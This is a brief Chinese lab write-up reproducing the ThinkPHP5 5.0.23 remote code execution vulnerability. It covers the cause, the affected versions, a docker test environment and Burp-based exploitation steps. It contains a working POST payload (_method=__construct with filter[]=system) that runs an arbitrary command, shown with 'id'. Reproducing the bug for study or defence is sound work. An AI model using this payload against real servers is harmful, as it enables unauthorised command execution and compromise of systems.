ThinkPHP5 5.0.23 远程代码执行漏洞
0x01 形成原因
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。
0x02 影响的版本
5.0.23和5.1.31之前的所有版本
0x03 启动环境
docker-compose up -d
访问靶机ip+端口号8080
0x04 漏洞利用
使用burp抓到首页的包
改变传参方式 GET改为POST
修改参数
url参数
/index.php?s=captcha
post参数
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
id是我们执行的命令,可更换我们需要的命令
将数据包发送出去
发现命令已经执行了
至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功